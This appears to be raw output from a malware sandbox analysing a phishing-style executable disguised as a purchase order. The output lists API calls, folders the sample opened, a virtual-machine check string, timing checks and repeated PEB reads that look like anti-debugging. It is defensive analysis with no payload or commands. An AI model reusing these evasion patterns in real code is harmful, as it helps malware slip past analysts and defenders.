      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047F6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407548173.0000000004810000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450448721.0000000004810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-4363
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-4368
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E21AE rdtsc 5_2_348E21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040264A MultiByteToWideChar,ReadFile,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,0_2_0040264A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70121B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70121B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34819486 mov eax, dword ptr fs:[00000030h]5_2_34819486
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489C460 mov ecx, dword ptr fs:[00000030h]5_2_3489C460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E547F mov eax, dword ptr fs:[00000030h]5_2_348E547F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812582 mov eax, dword ptr fs:[00000030h]5_2_34812582
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812582 mov ecx, dword ptr fs:[00000030h]5_2_34812582
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34844588 mov eax, dword ptr fs:[00000030h]5_2_34844588
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E59C mov eax, dword ptr fs:[00000030h]5_2_3484E59C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489B594 mov eax, dword ptr fs:[00000030h]5_2_3489B594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489B594 mov eax, dword ptr fs:[00000030h]5_2_3489B594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF5BE mov eax, dword ptr fs:[00000030h]5_2_348CF5BE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348345B1 mov eax, dword ptr fs:[00000030h]5_2_348345B1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348345B1 mov eax, dword ptr fs:[00000030h]5_2_348345B1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD5B0 mov eax, dword ptr fs:[00000030h]5_2_348AD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD5B0 mov eax, dword ptr fs:[00000030h]5_2_348AD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348455C0 mov eax, dword ptr fs:[00000030h]5_2_348455C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E55C9 mov eax, dword ptr fs:[00000030h]5_2_348E55C9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348165D0 mov eax, dword ptr fs:[00000030h]5_2_348165D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A5D0 mov eax, dword ptr fs:[00000030h]5_2_3484A5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A5D0 mov eax, dword ptr fs:[00000030h]5_2_3484A5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E5D1 mov eax, dword ptr fs:[00000030h]5_2_3484E5D1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E5D1 mov eax, dword ptr fs:[00000030h]5_2_3484E5D1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D5D0 mov eax, dword ptr fs:[00000030h]5_2_3488D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D5D0 mov ecx, dword ptr fs:[00000030h]5_2_3488D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348395DA mov eax, dword ptr fs:[00000030h]5_2_348395DA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C5ED mov eax, dword ptr fs:[00000030h]5_2_3484C5ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C5ED mov eax, dword ptr fs:[00000030h]5_2_3484C5ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34847505 mov eax, dword ptr fs:[00000030h]5_2_34847505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34847505 mov ecx, dword ptr fs:[00000030h]5_2_34847505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A6500 mov eax, dword ptr fs:[00000030h]5_2_348A6500
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CB52F mov eax, dword ptr fs:[00000030h]5_2_348CB52F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D530 mov eax, dword ptr fs:[00000030h]5_2_3484D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D530 mov eax, dword ptr fs:[00000030h]5_2_3484D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5537 mov eax, dword ptr fs:[00000030h]5_2_348E5537
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484B570 mov eax, dword ptr fs:[00000030h]5_2_3484B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484B570 mov eax, dword ptr fs:[00000030h]5_2_3484B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34814690 mov eax, dword ptr fs:[00000030h]5_2_34814690
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34814690 mov eax, dword ptr fs:[00000030h]5_2_34814690
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D6AA mov eax, dword ptr fs:[00000030h]5_2_3480D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D6AA mov eax, dword ptr fs:[00000030h]5_2_3480D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348466B0 mov eax, dword ptr fs:[00000030h]5_2_348466B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A6C7 mov ebx, dword ptr fs:[00000030h]5_2_3484A6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A6C7 mov eax, dword ptr fs:[00000030h]5_2_3484A6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348416CF mov eax, dword ptr fs:[00000030h]5_2_348416CF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF6C7 mov eax, dword ptr fs:[00000030h]5_2_348CF6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D6E0 mov eax, dword ptr fs:[00000030h]5_2_3483D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D6E0 mov eax, dword ptr fs:[00000030h]5_2_3483D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348436EF mov eax, dword ptr fs:[00000030h]5_2_348436EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348906F1 mov eax, dword ptr fs:[00000030h]5_2_348906F1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348906F1 mov eax, dword ptr fs:[00000030h]5_2_348906F1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CD6F0 mov eax, dword ptr fs:[00000030h]5_2_348CD6F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E609 mov eax, dword ptr fs:[00000030h]5_2_3488E609
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34841607 mov eax, dword ptr fs:[00000030h]5_2_34841607
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484F603 mov eax, dword ptr fs:[00000030h]5_2_3484F603
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813616 mov eax, dword ptr fs:[00000030h]5_2_34813616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813616 mov eax, dword ptr fs:[00000030h]5_2_34813616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852619 mov eax, dword ptr fs:[00000030h]5_2_34852619
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34846620 mov eax, dword ptr fs:[00000030h]5_2_34846620
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34848620 mov eax, dword ptr fs:[00000030h]5_2_34848620
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E627 mov eax, dword ptr fs:[00000030h]5_2_3482E627
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481262C mov eax, dword ptr fs:[00000030h]5_2_3481262C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5636 mov eax, dword ptr fs:[00000030h]5_2_348E5636
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482C640 mov eax, dword ptr fs:[00000030h]5_2_3482C640
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A660 mov eax, dword ptr fs:[00000030h]5_2_3484A660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A660 mov eax, dword ptr fs:[00000030h]5_2_3484A660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34849660 mov eax, dword ptr fs:[00000030h]5_2_34849660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34849660 mov eax, dword ptr fs:[00000030h]5_2_34849660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD660 mov eax, dword ptr fs:[00000030h]5_2_348AD660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34842674 mov eax, dword ptr fs:[00000030h]5_2_34842674
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B678E mov eax, dword ptr fs:[00000030h]5_2_348B678E
